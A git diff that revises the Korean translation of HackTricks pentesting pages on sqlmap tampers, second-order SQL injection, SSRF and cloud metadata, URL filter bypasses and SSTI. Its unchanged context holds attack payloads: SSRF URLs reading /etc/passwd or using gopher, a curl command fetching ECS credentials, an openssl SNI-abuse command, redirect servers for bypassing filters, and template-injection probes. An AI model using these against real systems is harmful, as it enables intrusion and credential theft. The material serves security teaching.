+| space2morehash.py            | 공백 문자(' ')를 파운드 문자('#')로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                           |
 | space2mssqlblank.py          | 공백 문자(' ')를 유효한 대체 문자 집합에서 무작위 공백 문자로 대체합니다.                                                          |
-| space2mssqlhash.py           | 공백 문자(' ')를 새 줄('\n')이 뒤따르는 파운드 문자('#')로 대체합니다.                                                            |
+| space2mssqlhash.py           | 공백 문자(' ')를 파운드 문자('#')로 대체하고 새 줄('\n')을 추가합니다.                                                            |
 | space2mysqlblank.py          | 공백 문자(' ')를 유효한 대체 문자 집합에서 무작위 공백 문자로 대체합니다.                                                          |
-| space2mysqldash.py           | 공백 문자(' ')를 새 줄('\n')이 뒤따르는 대시 주석('--')으로 대체합니다.                                                           |
+| space2mysqldash.py           | 공백 문자(' ')를 대시 주석('--')으로 대체하고 새 줄('\n')을 추가합니다.                                                          |
 | space2plus.py                | 공백 문자(' ')를 더하기 기호('+')로 대체합니다.                                                                                     |
 | space2randomblank.py         | 공백 문자(' ')를 유효한 대체 문자 집합에서 무작위 공백 문자로 대체합니다.                                                          |
 | symboliclogical.py           | AND 및 OR 논리 연산자를 그들의 기호 대응물(&& 및 ||)로 대체합니다.                                                                  |
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index bc818baa4..28506f160 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -16,9 +16,9 @@ sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
 #Get the SQL payload execution sending a custom request from a file
 sqlmap -r login.txt -p username --second-req details.txt
 ```
-여러 경우에 **이것만으로는 충분하지 않을 것입니다**. 왜냐하면 페이로드를 전송하고 다른 페이지에 접근하는 것 외에 **다른 작업을 수행해야** 할 필요가 있기 때문입니다.
+여러 경우에 **이것만으로는 충분하지 않을 것입니다**. 왜냐하면 **페이로드를 전송하고 다른 페이지에 접근하는 것 외에 다른 작업을 수행해야** 하기 때문입니다.
 
-이럴 때는 **sqlmap tamper**를 사용할 수 있습니다. 예를 들어, 다음 스크립트는 **sqlmap 페이로드를 이메일로 사용하여** 새 사용자를 등록하고 로그아웃합니다.
+이것이 필요할 때 **sqlmap tamper**를 사용할 수 있습니다. 예를 들어, 다음 스크립트는 **sqlmap 페이로드를 이메일로 사용하여** 새 사용자를 등록하고 로그아웃합니다.
 ```python
 #!/usr/bin/env python
 
@@ -46,9 +46,9 @@ headers = kwargs.get("headers", {})
 login_account(payload)
 return payload
 ```
-A **SQLMap tamper는 페이로드로 인젝션 시도를 시작하기 전에 항상 실행됩니다** **그리고 페이로드를 반환해야 합니다**. 이 경우 우리는 페이로드에 신경 쓰지 않고 요청을 보내는 것에 신경 쓰므로 페이로드는 변경되지 않습니다.
+A **SQLMap tamper는 페이로드로 인젝션 시도를 시작하기 전에 항상 실행됩니다** **그리고 페이로드를 반환해야 합니다**. 이 경우 우리는 페이로드에 신경 쓰지 않지만, 몇 가지 요청을 보내는 것에 신경 쓰므로 페이로드는 변경되지 않습니다.
 
-그래서, 어떤 이유로 인해 두 번째 SQL 인젝션을 이용하기 위해 더 복잡한 흐름이 필요하다면:
+따라서, 어떤 이유로 인해 두 번째 SQL 인젝션을 악용하기 위해 더 복잡한 흐름이 필요하다면:
 
 - "이메일" 필드에 SQLi 페이로드가 포함된 계정을 생성합니다.
 - 로그아웃합니다.
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index 4a3d37d6d..a11a6de9e 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -30,19 +30,19 @@ url-format-bypass.md
 
 ### 오픈 리디렉션을 통한 우회
 
-서버가 제대로 보호되어 있다면 **웹 페이지 내의 오픈 리디렉션을 이용하여 모든 제한을 우회할 수 있습니다**. 웹 페이지는 **같은 도메인에 대한 SSRF를 허용하고 아마도 **리디렉션을 따를 것입니다**, 이를 통해 **오픈 리디렉션을 이용해 서버가 내부의 어떤 리소스에도 접근하도록 할 수 있습니다**.\
+서버가 제대로 보호되어 있다면 **웹 페이지 내의 오픈 리디렉션을 이용하여 모든 제한을 우회할 수 있습니다**. 웹 페이지는 **같은 도메인에 대한 SSRF를 허용하고 아마도 **리디렉션을 따를 것입니다**, 이를 통해 **오픈 리디렉션을 이용해 서버가 내부의 어떤 자원에 접근하도록 할 수 있습니다**.\
 자세한 내용은 여기에서 확인하세요: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
 
 ## 프로토콜
 
 - **file://**
-- URL 스킴 `file://`이 참조되며, `/etc/passwd`를 직접 가리킵니다: `file:///etc/passwd`
+- URL 스킴 `file://`가 참조되며, `/etc/passwd`를 직접 가리킵니다: `file:///etc/passwd`
 - **dict://**
-- DICT URL 스킴은 DICT 프로토콜을 통해 정의나 단어 목록에 접근하는 데 사용됩니다. 특정 단어, 데이터베이스 및 항목 번호를 목표로 하는 URL을 구성한 예가 제공되며, 공격자가 제공한 자격 증명을 사용하여 DICT 서버에 연결하기 위해 PHP 스크립트가 잘못 사용될 수 있는 사례도 포함됩니다: `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
+- DICT URL 스킴은 DICT 프로토콜을 통해 정의나 단어 목록에 접근하는 데 사용됩니다. 특정 단어, 데이터베이스 및 항목 번호를 타겟으로 하는 URL을 구성한 예가 제공되며, 공격자가 제공한 자격 증명을 사용하여 DICT 서버에 연결하기 위해 PHP 스크립트가 잘못 사용될 수 있는 경우를 설명합니다: `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
 - **SFTP://**
 - 보안 셸을 통한 안전한 파일 전송 프로토콜로 확인되며, 악성 SFTP 서버에 연결하기 위해 PHP 스크립트를 악용하는 방법을 보여주는 예가 제공됩니다: `url=sftp://generic.com:11111/`
 - **TFTP://**
-- UDP를 통해 작동하는 트리비얼 파일 전송 프로토콜이 언급되며, TFTP 서버에 요청을 보내기 위해 설계된 PHP 스크립트의 예가 포함됩니다. 'generic.com'의 포트 '12346'에 대해 파일 'TESTUDPPACKET'에 대한 TFTP 요청이 이루어집니다: `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
+- UDP를 통해 작동하는 트리비얼 파일 전송 프로토콜이 언급되며, TFTP 서버에 요청을 보내기 위해 설계된 PHP 스크립트의 예가 제공됩니다. 'generic.com'의 포트 '12346'에 'TESTUDPPACKET' 파일에 대한 TFTP 요청이 이루어집니다: `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
 - **LDAP://**
 - 이 섹션은 경량 디렉터리 접근 프로토콜을 다루며, IP 네트워크를 통해 분산 디렉터리 정보 서비스 관리 및 접근에 사용됩니다. 로컬호스트에서 LDAP 서버와 상호작용: `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
 - **SMTP**
@@ -55,17 +55,17 @@ From https://twitter.com/har1sec/status/1182255952055164929
 4. connect
 ```
 - **Curl URL globbing - WAF 우회**
-- SSRF가 **curl**에 의해 실행되는 경우, curl에는 WAF를 우회하는 데 유용할 수 있는 [**URL globbing**](https://everything.curl.dev/cmdline/globbing)이라는 기능이 있습니다. 예를 들어 이 [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi)에서 **`file` 프로토콜을 통한 경로 탐색**에 대한 예제를 찾을 수 있습니다:
+- SSRF가 **curl**에 의해 실행되는 경우, curl에는 WAF를 우회하는 데 유용할 수 있는 [**URL globbing**](https://everything.curl.dev/cmdline/globbing)이라는 기능이 있습니다. 예를 들어 이 [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi)에서 **`file` 프로토콜을 통한 경로 탐색**의 예를 찾을 수 있습니다:
 ```
 file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
 ```
 - **Gopher://**
-- Gopher 프로토콜의 서버 통신을 위한 IP, 포트 및 바이트를 지정하는 기능과 페이로드를 작성하기 위한 Gopherus 및 remote-method-guesser와 같은 도구에 대해 논의합니다. 두 가지 뚜렷한 사용 사례가 설명됩니다:
+- Gopher 프로토콜의 IP, 포트 및 바이트를 서버 통신을 위해 지정할 수 있는 기능과 페이로드를 작성하기 위한 Gopherus 및 remote-method-guesser와 같은 도구에 대해 논의합니다. 두 가지 뚜렷한 사용 사례가 설명됩니다:
 
 ### Gopher://
 
-이 프로토콜을 사용하면 서버가 **전송**할 **IP, 포트 및 바이트**를 지정할 수 있습니다. 그런 다음 기본적으로 SSRF를 이용하여 **모든 TCP 서버와 통신**할 수 있습니다(하지만 먼저 서비스와 대화하는 방법을 알아야 합니다).\
-다행히도 여러 서비스에 대한 페이로드를 생성하기 위해 [Gopherus](https://github.com/tarunkant/Gopherus)를 사용할 수 있습니다. 또한, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)를 사용하여 _Java RMI_ 서비스에 대한 _gopher_ 페이로드를 생성할 수 있습니다.
+이 프로토콜을 사용하면 서버가 **전송**할 **IP, 포트 및 바이트**를 지정할 수 있습니다. 그런 다음, 기본적으로 SSRF를 이용하여 **모든 TCP 서버와 통신**할 수 있습니다(하지만 먼저 서비스와 대화하는 방법을 알아야 합니다).\
+다행히도, 여러 서비스에 대한 페이로드를 생성하기 위해 [Gopherus](https://github.com/tarunkant/Gopherus)를 사용할 수 있습니다. 또한, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)를 사용하여 _Java RMI_ 서비스에 대한 _gopher_ 페이로드를 생성할 수 있습니다.
 
 **Gopher smtp**
 ```
@@ -121,7 +121,7 @@ ssl_preread on;
 }
 }
 ```
-이 구성에서 Server Name Indication (SNI) 필드의 값은 백엔드 주소로 직접 사용됩니다. 이 설정은 Server-Side Request Forgery (SSRF)에 대한 취약점을 노출시키며, SNI 필드에 원하는 IP 주소나 도메인 이름을 지정하는 것만으로도 악용될 수 있습니다. 임의의 백엔드, 예를 들어 `internal.host.com`에 연결을 강제하기 위한 악용 예시는 아래와 같습니다:
+이 구성에서는 Server Name Indication (SNI) 필드의 값이 백엔드 주소로 직접 사용됩니다. 이 설정은 Server-Side Request Forgery (SSRF)에 대한 취약점을 노출시키며, SNI 필드에 원하는 IP 주소나 도메인 이름을 지정하는 것만으로도 악용될 수 있습니다. `openssl` 명령을 사용하여 `internal.host.com`과 같은 임의의 백엔드에 연결을 강제하는 악용 예시는 아래에 제시되어 있습니다:
 ```bash
 openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 ```
@@ -133,7 +133,7 @@ openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 
 ## PDF 렌더링
 
-웹 페이지가 제공한 정보를 바탕으로 자동으로 PDF를 생성하는 경우, **PDF 생성기**(서버)에 의해 실행될 JS를 **삽입할 수 있으며**, 이를 통해 SSRF를 악용할 수 있습니다. [**자세한 정보는 여기에서 확인하세요**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
+웹 페이지가 제공한 정보를 바탕으로 자동으로 PDF를 생성하는 경우, **PDF 생성기**(서버)에 의해 실행될 일부 JS를 **삽입할 수 있으며**, 이를 통해 SSRF를 악용할 수 있습니다. [**자세한 정보는 여기에서 확인하세요**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
 
 ## SSRF에서 DoS로
 
@@ -149,7 +149,7 @@ openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 
 ## Gopher로의 SSRF 리디렉션
 
-일부 익스플로잇을 위해 **리디렉션 응답을 전송해야 할 수 있습니다**(gopher와 같은 다른 프로토콜을 사용하기 위해). 여기에는 리디렉션으로 응답하는 다양한 파이썬 코드가 있습니다:
+일부 익스플로잇을 위해 **리디렉션 응답을 전송해야 할 수 있습니다**(다른 프로토콜인 gopher를 사용할 수 있습니다). 여기 리디렉션으로 응답하기 위한 다양한 파이썬 코드가 있습니다:
 ```python
 # First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
 from http.server import HTTPServer, BaseHTTPRequestHandler
@@ -245,7 +245,7 @@ var_dump($response);
 ```
 </details>
 
-PHP는 URL 경로의 슬래시 앞에 **문자 `*`**를 사용할 수 있지만, 루트 경로 `/`에만 사용할 수 있고 첫 번째 슬래시 앞에 점 `.`이 허용되지 않는 등의 다른 제한이 있습니다. 따라서 예를 들어 점 없는 16진수로 인코딩된 IP 주소를 사용해야 합니다:
+PHP는 URL의 경로에서 슬래시 앞에 **문자 `*`**를 사용할 수 있지만, 루트 경로 `/`에만 사용할 수 있고 첫 번째 슬래시 앞에 점 `.`이 허용되지 않는 등의 다른 제한이 있습니다. 따라서 예를 들어 점 없는 헥스 인코딩된 IP 주소를 사용해야 합니다:
 ```http
 GET *@0xa9fea9fe/ HTTP/1.1
 Host: target.com
@@ -263,7 +263,7 @@ Connection: close
 
 [**`Singularity of Origin`**](https://github.com/nccgroup/singularity)은 [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) 공격을 수행하는 도구입니다. 공격 서버의 DNS 이름의 IP 주소를 대상 머신의 IP 주소로 다시 바인딩하고, 대상 머신의 취약한 소프트웨어를 악용하기 위한 공격 페이로드를 제공하는 데 필요한 구성 요소를 포함하고 있습니다.
 
-또한 **공식적으로 운영되는 서버**를 확인해 보세요: [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)
+또한 **공식적으로 운영되는 서버를 확인하세요** [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)
 
 ## DNS Rebidding + TLS 세션 ID/세션 티켓
 
@@ -282,13 +282,13 @@ Connection: close
 5. DNS 요청에서 **이제** **사설 IP** 주소가 제공됩니다 (예: 127.0.0.1).
 6. 사용자/봇은 **TLS 연결을 재설정**하려고 시도하며, 이를 위해 **세션** ID/티켓 ID를 **전송**합니다 (여기에는 **공격자의 페이로드**가 포함되어 있습니다). 축하합니다, 당신은 **사용자/봇이 스스로 공격하도록 요청**하는 데 성공했습니다.
 
-이 공격 중에, 만약 localhost:11211 (_memcache_)를 공격하고 싶다면, 피해자가 www.attacker.com:11211과 초기 연결을 설정하도록 해야 합니다 ( **포트는 항상 동일해야 합니다**).\
+이 공격 중에, 만약 localhost:11211 (_memcache_)를 공격하고 싶다면, 피해자가 www.attacker.com:11211과 초기 연결을 설정하도록 해야 합니다 (포트는 항상 동일해야 합니다).\
 이 공격을 수행하기 위해 사용할 수 있는 도구: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
-**자세한 정보**는 이 공격이 설명된 강의를 확인하세요: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference)
+자세한 정보는 이 공격이 설명된 강의를 확인하세요: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference)
 
 ## 블라인드 SSRF
 
-블라인드 SSRF와 비블라인드 SSRF의 차이는 블라인드에서는 SSRF 요청의 응답을 볼 수 없다는 것입니다. 따라서 잘 알려진 취약점만을 악용할 수 있기 때문에 더 어렵습니다.
+블라인드 SSRF와 비블라인드 SSRF의 차이는 블라인드에서는 SSRF 요청의 응답을 볼 수 없다는 것입니다. 따라서 잘 알려진 취약점만을 이용할 수 있기 때문에 더 어렵습니다.
 
 ### 시간 기반 SSRF
 
@@ -304,7 +304,7 @@ cloud-ssrf.md
 
 ## SSRF 취약한 플랫폼
 
-여러 알려진 플랫폼에는 SSRF 취약점이 포함되어 있거나 포함된 적이 있습니다. 확인해 보세요:
+여러 알려진 플랫폼이 SSRF 취약점을 포함하거나 포함한 적이 있으니, 확인해 보세요:
 
 {{#ref}}
 ssrf-vulnerable-platforms.md
@@ -318,7 +318,7 @@ SSRF 취약점을 탐지하고 악용하는 도구입니다.
 
 ### [Gopherus](https://github.com/tarunkant/Gopherus)
 
-- [Gopherus에 대한 블로그 게시물](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
+- [Gopherus에 대한 블로그 포스트](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
 
 이 도구는 다음을 위한 Gopher 페이로드를 생성합니다:
 
@@ -331,7 +331,7 @@ SSRF 취약점을 탐지하고 악용하는 도구입니다.
 
 ### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
 
-- [SSRF 사용에 대한 블로그 게시물](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
+- [SSRF 사용에 대한 블로그 포스트](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
 
 _remote-method-guesser_는 대부분의 일반적인 _Java RMI_ 취약점에 대한 공격 작업을 지원하는 _Java RMI_ 취약점 스캐너입니다. 사용 가능한 대부분의 작업은 요청된 작업에 대한 _SSRF_ 페이로드를 생성하기 위해 `--ssrf` 옵션을 지원합니다. `--gopher` 옵션과 함께 사용하면 즉시 사용할 수 있는 _gopher_ 페이로드를 직접 생성할 수 있습니다.
 
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index 7b8d41bac..49076a12f 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -8,7 +8,7 @@
 
 **메타데이터** 엔드포인트는 모든 EC2 머신 내부에서 접근할 수 있으며, 흥미로운 정보를 제공합니다. URL에서 접근할 수 있습니다: `http://169.254.169.254` ([메타데이터에 대한 정보는 여기](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
 
-메타데이터 엔드포인트에는 **2가지 버전**이 있습니다. **첫 번째** 버전은 **GET** 요청을 통해 엔드포인트에 **접근**할 수 있게 해줍니다 (따라서 어떤 **SSRF도 이를 악용할 수 있습니다**). **버전 2**인 [IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)에서는 **토큰**을 요청하기 위해 **PUT** 요청을 보내고 **HTTP 헤더**를 사용해야 하며, 그 후에 또 다른 HTTP 헤더를 사용하여 메타데이터에 접근해야 합니다 (따라서 **SSRF로 악용하기 더 복잡합니다**).
+메타데이터 엔드포인트에는 **2가지 버전**이 있습니다. **첫 번째** 버전은 **GET** 요청을 통해 엔드포인트에 **접근**할 수 있게 해줍니다 (따라서 어떤 **SSRF도 이를 악용할 수 있습니다**). **버전 2**인 [IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)에서는 **토큰**을 요청하기 위해 **PUT** 요청을 보내고 **HTTP 헤더**를 사용해야 하며, 그 후에 해당 토큰을 사용하여 다른 HTTP 헤더로 메타데이터에 접근해야 합니다 (따라서 **SSRF로 악용하기 더 복잡합니다**).
 
 > [!CAUTION]
 > EC2 인스턴스가 IMDSv2를 강제하는 경우, [**문서에 따르면**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), **PUT 요청의 응답**은 **hop limit이 1**이 되어 EC2 인스턴스 내부의 컨테이너에서 EC2 메타데이터에 접근할 수 없게 됩니다.
@@ -96,7 +96,7 @@ aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4
 
 **ECS**는 애플리케이션을 실행할 수 있는 EC2 인스턴스의 논리적 그룹으로, ECS가 클러스터 관리 인프라를 대신 관리하기 때문에 자체 클러스터 관리 인프라를 확장할 필요가 없습니다. **ECS**에서 실행 중인 서비스를 손상시키면 **메타데이터 엔드포인트가 변경**됩니다.
 
-_**http://169.254.170.2/v2/credentials/\<GUID>**_에 접근하면 ECS 머신의 자격 증명을 찾을 수 있습니다. 그러나 먼저 **\<GUID>**를 찾아야 합니다. \<GUID>를 찾으려면 머신 내의 **environ** 변수 **AWS_CONTAINER_CREDENTIALS_RELATIVE_URI**를 읽어야 합니다.\
+_**http://169.254.170.2/v2/credentials/\<GUID>**_에 접근하면 ECS 머신의 자격 증명을 찾을 수 있습니다. 하지만 먼저 **\<GUID>**를 찾아야 합니다. \<GUID>를 찾으려면 머신 내의 **environ** 변수 **AWS_CONTAINER_CREDENTIALS_RELATIVE_URI**를 읽어야 합니다.\
 **Path Traversal**을 이용해 `file:///proc/self/environ`을 읽을 수 있습니다.\
 언급된 http 주소는 **AccessKey, SecretKey 및 token**을 제공해야 합니다.
 ```bash
@@ -118,7 +118,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
 게다가 IAM 자격 증명 외에도 Lambda 함수는 **함수가 시작될 때 함수에 전달되는 이벤트 데이터**를 가지고 있습니다. 이 데이터는 [런타임 인터페이스](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html)를 통해 함수에 제공되며 **민감한** **정보**(예: **stageVariables** 내부)를 포함할 수 있습니다. IAM 자격 증명과 달리 이 데이터는 표준 SSRF를 통해 **`http://localhost:9001/2018-06-01/runtime/invocation/next`**에서 접근할 수 있습니다.
 
 > [!WARNING]
-> **람다 자격 증명**이 **환경 변수** 안에 있다는 점에 유의하세요. 따라서 람다 코드의 **스택 추적**이 환경 변수를 출력하면, 앱에서 **오류를 유발하여 이를 유출할 수** 있습니다.
+> **lambda 자격 증명**이 **환경 변수** 안에 있다는 점에 유의하세요. 따라서 lambda 코드의 **스택 추적**이 환경 변수를 출력하면, 앱에서 **오류를 유발하여 이를 유출할 수** 있습니다.
 
 ### AWS Elastic Beanstalk에 대한 SSRF URL <a href="#id-6f97" id="id-6f97"></a>
 
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index c9bbf9581..c5e3c7819 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -151,20 +151,20 @@ https://metadata/vulerable/path#/expected/path
 https://metadata/vulerable/path#.extension
 https://metadata/expected/path/..%2f..%2f/vulnerable/path
 ```
-### Fuzzing
+### 퍼징
 
-The tool [**recollapse**](https://github.com/0xacb/recollapse)는 주어진 입력에서 변형을 생성하여 사용된 regex를 우회하려고 시도할 수 있습니다. 더 많은 정보는 [**이 게시물**](https://0xacb.com/2022/11/21/recollapse/)을 확인하세요.
+도구 [**recollapse**](https://github.com/0xacb/recollapse)는 주어진 입력에서 변형을 생성하여 사용된 정규 표현식을 우회하려고 시도할 수 있습니다. 추가 정보는 [**이 게시물**](https://0xacb.com/2022/11/21/recollapse/)을 확인하세요.
 
-### Automatic Custom Wordlists
+### 자동 맞춤 단어 목록
 
-[**URL validation bypass cheat sheet** 웹앱](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet)을 확인해보세요. 여기서 허용된 호스트와 공격자의 호스트를 입력하면 시도할 URL 목록을 생성해줍니다. 또한 URL을 매개변수, Host 헤더 또는 CORS 헤더에서 사용할 수 있는지 고려합니다.
+포트스위거의 [**URL 검증 우회 치트 시트** 웹앱](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet)을 확인해 보세요. 여기에서 허용된 호스트와 공격자의 호스트를 입력하면 시도할 URL 목록을 생성합니다. 또한 URL을 매개변수, Host 헤더 또는 CORS 헤더에서 사용할 수 있는지 고려합니다.
 
 {% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}
 
-### Bypass via redirect
+### 리디렉션을 통한 우회
 
-서버가 SSRF의 **원래 요청을 필터링**하고 **가능한 리디렉션** 응답은 필터링하지 않을 가능성이 있습니다.\
-예를 들어, `url=https://www.google.com/`를 통해 SSRF에 취약한 서버는 **url 매개변수를 필터링**할 수 있습니다. 그러나 [python 서버를 사용하여 302로 응답](https://pastebin.com/raw/ywAUhFrv)하면 리디렉션하려는 위치로 이동할 수 있으며, 필터링된 IP 주소인 127.0.0.1 또는 필터링된 **프로토콜**인 gopher에 **접근할 수** 있을 수 있습니다.\
+서버가 SSRF의 **원래 요청을 필터링**하고 **리디렉션** 응답은 필터링하지 않을 가능성이 있습니다.\
+예를 들어, `url=https://www.google.com/`를 통해 SSRF에 취약한 서버는 **url 매개변수를 필터링**할 수 있습니다. 그러나 [파이썬 서버를 사용하여 302로 응답](https://pastebin.com/raw/ywAUhFrv)하여 리디렉션하려는 위치로 이동하면 **필터링된 IP 주소**인 127.0.0.1 또는 필터링된 **프로토콜**인 gopher에 **접근할 수** 있을 수 있습니다.\
 [이 보고서를 확인하세요.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
 ```python
 #!/usr/bin/env python3
@@ -190,7 +190,7 @@ HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
 
 ### 백슬래시 트릭
 
-_백슬래시 트릭_은 [WHATWG URL 표준](https://url.spec.whatwg.org/#url-parsing)과 [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B) 간의 차이를 이용합니다. RFC3986은 URI에 대한 일반적인 프레임워크인 반면, WHATWG는 웹 URL에 특정하며 현대 브라우저에서 채택되고 있습니다. 주요 차이점은 WHATWG 표준이 백슬래시(`\`)를 슬래시(`/`)와 동등하게 인식하여 URL이 구문 분석되는 방식에 영향을 미치며, 특히 URL에서 호스트 이름에서 경로로의 전환을 표시합니다.
+_백슬래시 트릭_은 [WHATWG URL 표준](https://url.spec.whatwg.org/#url-parsing)과 [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B) 간의 차이를 이용합니다. RFC3986은 URI에 대한 일반적인 프레임워크인 반면, WHATWG는 웹 URL에 특정하며 현대 브라우저에서 채택되고 있습니다. 주요 차이점은 WHATWG 표준이 백슬래시(`\`)를 슬래시(`/`)와 동등하게 인식하여 URL이 구문 분석되는 방식에 영향을 미치며, 특히 URL에서 호스트 이름에서 경로로의 전환을 표시하는 데 있습니다.
 
 ![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg)
 
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 90ae50f39..0657a8c7a 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1,11 +1,11 @@
-# SSTI (서버 측 템플릿 주입)
+# SSTI (서버 사이드 템플릿 인젝션)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-## SSTI (서버 측 템플릿 주입)란 무엇인가
+## SSTI (서버 사이드 템플릿 인젝션)란 무엇인가
 
-서버 측 템플릿 주입은 공격자가 서버에서 실행되는 템플릿에 악성 코드를 주입할 수 있을 때 발생하는 취약점입니다. 이 취약점은 Jinja를 포함한 다양한 기술에서 발견될 수 있습니다.
+서버 사이드 템플릿 인젝션은 공격자가 서버에서 실행되는 템플릿에 악성 코드를 주입할 수 있을 때 발생하는 취약점입니다. 이 취약점은 Jinja를 포함한 다양한 기술에서 발견될 수 있습니다.
 
 Jinja는 웹 애플리케이션에서 사용되는 인기 있는 템플릿 엔진입니다. Jinja를 사용한 취약한 코드 스니펫을 보여주는 예를 고려해 봅시다:
 ```python
@@ -13,7 +13,7 @@ output = template.render(name=request.args.get('name'))
 ```
 이 취약한 코드에서 사용자의 요청으로부터 `name` 매개변수가 `render` 함수를 사용하여 템플릿에 직접 전달됩니다. 이는 공격자가 `name` 매개변수에 악성 코드를 주입할 수 있게 하여 서버 측 템플릿 주입으로 이어질 수 있습니다.
 
-예를 들어, 공격자는 다음과 같은 페이로드를 포함한 요청을 만들 수 있습니다:
+예를 들어, 공격자는 다음과 같은 페이로드로 요청을 조작할 수 있습니다:
 ```
 http://vulnerable-website.com/?name={{bad-stuff-here}}
 ```
@@ -25,14 +25,14 @@ http://vulnerable-website.com/?name={{bad-stuff-here}}
 
 서버 측 템플릿 주입(SSTI)을 탐지하기 위해, 처음에는 **템플릿 퍼징**이 간단한 접근 방식입니다. 이는 특수 문자 시퀀스 (**`${{<%[%'"}}%\`**)를 템플릿에 주입하고 서버의 응답에서 일반 데이터와 이 특수 페이로드의 차이를 분석하는 것을 포함합니다. 취약점 지표에는 다음이 포함됩니다:
 
-- 취약점을 드러내고 잠재적으로 템플릿 엔진을 노출하는 오류 발생.
-- 반사에서 페이로드가 없거나 일부가 누락되어 서버가 이를 일반 데이터와 다르게 처리함을 암시.
+- 취약점을 드러내는 오류 발생, 잠재적으로 템플릿 엔진을 노출.
+- 반사에서 페이로드가 없거나 일부가 누락되어, 서버가 이를 일반 데이터와 다르게 처리함을 암시.
 - **평문 컨텍스트**: 서버가 템플릿 표현식을 평가하는지 확인하여 XSS와 구별 (예: `{{7*7}}`, `${7*7}`).
 - **코드 컨텍스트**: 입력 매개변수를 변경하여 취약점을 확인. 예를 들어, `http://vulnerable-website.com/?greeting=data.username`에서 `greeting`을 변경하여 서버의 출력이 동적 또는 고정인지 확인, `greeting=data.username}}hello`가 사용자 이름을 반환하는지 확인.
 
 #### 식별 단계
 
